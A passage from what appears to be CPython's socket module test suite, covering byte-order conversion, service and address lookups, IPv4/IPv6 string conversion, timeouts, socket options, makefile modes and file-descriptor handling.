self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
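    # A concrete illustration of the round-trip checked above (byte values
    # shown assume a little-endian host, which is an assumption, not
    # something the test relies on): socket.htons(0x1234) == 0x3412 and
    # socket.ntohs(0x3412) == 0x1234, so ntohs(htons(x)) == x for any
    # 16-bit value; htonl()/ntohl() behave the same way for 32-bit values.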
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on these platforms: a non-standard
# port/protocol entry there breaks this test's assumption that
# the tcp and udp entries for a service share the same port
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A freshly created socket should have SO_REUSEADDR unset (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test the workaround for an OS X platform bug that
# caused a segfault.
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd, because on that path it doesn't actually verify the family
# and type and simply populates the socket object from the given values.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach the old fd to avoid a double close (see the standalone sketch after this class)
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
